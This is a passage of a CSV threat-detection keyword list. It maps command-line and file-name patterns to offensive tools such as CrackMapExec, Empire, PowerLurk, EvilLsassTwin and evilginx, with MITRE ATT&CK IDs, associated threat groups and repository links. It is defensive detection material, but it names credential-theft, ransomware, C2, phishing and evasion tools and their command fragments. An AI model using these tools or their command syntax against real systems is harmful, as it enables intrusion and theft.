EncryptHub-WINRAR-*",".{0,1000}\sEncryptHub\-WINRAR\-.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","1046" "* encryption_aes.exe*",".{0,1000}\sencryption_aes\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1047" "* 
encryption_rc4.exe*",".{0,1000}\sencryption_rc4\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1048" "* -endpoint * -adcs * -listenerport *",".{0,1000}\s\-endpoint\s.{0,1000}\s\-adcs\s.{0,1000}\s\-listenerport\s.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","1049" "* endpoint_takeover.py*",".{0,1000}\sendpoint_takeover\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","1050" "* --enigma-path-x86 *",".{0,1000}\s\-\-enigma\-path\-x86\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1051" "* --enigma-protected-exe-cmdline 
*",".{0,1000}\s\-\-enigma\-protected\-exe\-cmdline\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1052" "* enip-info.nse*",".{0,1000}\senip\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1053" "* enum 127.0.0.1 *",".{0,1000}\senum\s127\.0\.0\.1\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","1054" "* enum -passive -d *",".{0,1000}\senum\s\-passive\s\-d\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1055" "* --enum --validate-msol *",".{0,1000}\s\-\-enum\s\-\-validate\-msol\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform 
framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1056" "* --enum --validate-teams*",".{0,1000}\s\-\-enum\s\-\-validate\-teams.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1057" "* enum_avproducts*",".{0,1000}\senum_avproducts.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1058" "* enum_chrome*",".{0,1000}\senum_chrome.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1059" "* enum_dns*",".{0,1000}\senum_dns.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1060" "* EnumBrowsers.ps1*",".{0,1000}\sEnumBrowsers\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - 
TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","1061" "* -Enumerate * -Module *",".{0,1000}\s\-Enumerate\s.{0,1000}\s\-Module\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1062" "* EnumerateDCs.ahk*",".{0,1000}\sEnumerateDCs\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","1063" "* enumeration_process.exe*",".{0,1000}\senumeration_process\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1064" "* --enum-local-admins*",".{0,1000}\s\-\-enum\-local\-admins.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","1065" "* -ep Bypass -enc $b64FileServerMonitoringScript*",".{0,1000}\s\-ep\sBypass\s\-enc\s\$b64FileServerMonitoringScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","1066" "* epmd-info.nse*",".{0,1000}\sepmd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1069" "* eppc-enum-processes.nse*",".{0,1000}\seppc\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1070" "* EternalHushCore *",".{0,1000}\sEternalHushCore\s.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","1073" "* etumbot.py*",".{0,1000}\setumbot\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","1074" "* EtwHash*",".{0,1000}\sEtwHash.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","0","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","1075" "* etwunhook.cpp*",".{0,1000}\setwunhook\.cpp.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","1076" "* etwunhook.exe*",".{0,1000}\setwunhook\.exe.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. 
Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","1077" "* -eval *caplets.update* ui.update*",".{0,1000}\s\-eval\s.{0,1000}caplets\.update.{0,1000}\sui\.update.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","1078" "* EventLogCredentials.ps1*",".{0,1000}\sEventLogCredentials\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","1079" "* -EventName KeeThief -WMI*",".{0,1000}\s\-EventName\sKeeThief\s\-WMI.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","1080" "* -EventName WmiBackdoor -PermanentCommand *",".{0,1000}\s\-EventName\sWmiBackdoor\s\-PermanentCommand\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - 
T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","1081" "* EventViewer-UACBypass*",".{0,1000}\sEventViewer\-UACBypass.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","1082" "* evil.corp *",".{0,1000}\sevil\.corp\s.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","1083" "* evil_DDL_trigger*",".{0,1000}\sevil_DDL_trigger.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","1084" "* evil_script.py*",".{0,1000}\sevil_script\.py.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","1085" "* EvilClippyManager*",".{0,1000}\sEvilClippyManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","1086" "* evilginx*",".{0,1000}\sevilginx.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","1087" "* EvilnoVNC by @JoelGMSec*",".{0,1000}\sEvilnoVNC\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux 
#content","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","1088" "* EvilnoVNC*",".{0,1000}\sEvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","1089" "* evil-proxy*",".{0,1000}\sevil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","1090" "* evil-proxy.rb*",".{0,1000}\sevil\-proxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","1091" "* evilrdp.gui *",".{0,1000}\sevilrdp\.gui\s.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","1092" "* evilscript.ps1*",".{0,1000}\sevilscript\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","1093" "* EvilTwinServer *",".{0,1000}\sEvilTwinServer\s.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","1094" "* -ExchHostname * -Password *",".{0,1000}\s\-ExchHostname\s.{0,1000}\s\-Password\s.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","1095" "* --excludedcs*",".{0,1000}\s\-\-excludedcs.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","1096" "* exclusion.c /Fodefender.o*",".{0,1000}\sexclusion\.c\s\/Fodefender\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - 
Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","1097" "* -ExeArguments *",".{0,1000}\s\-ExeArguments\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1098" "* exec * -p * -c 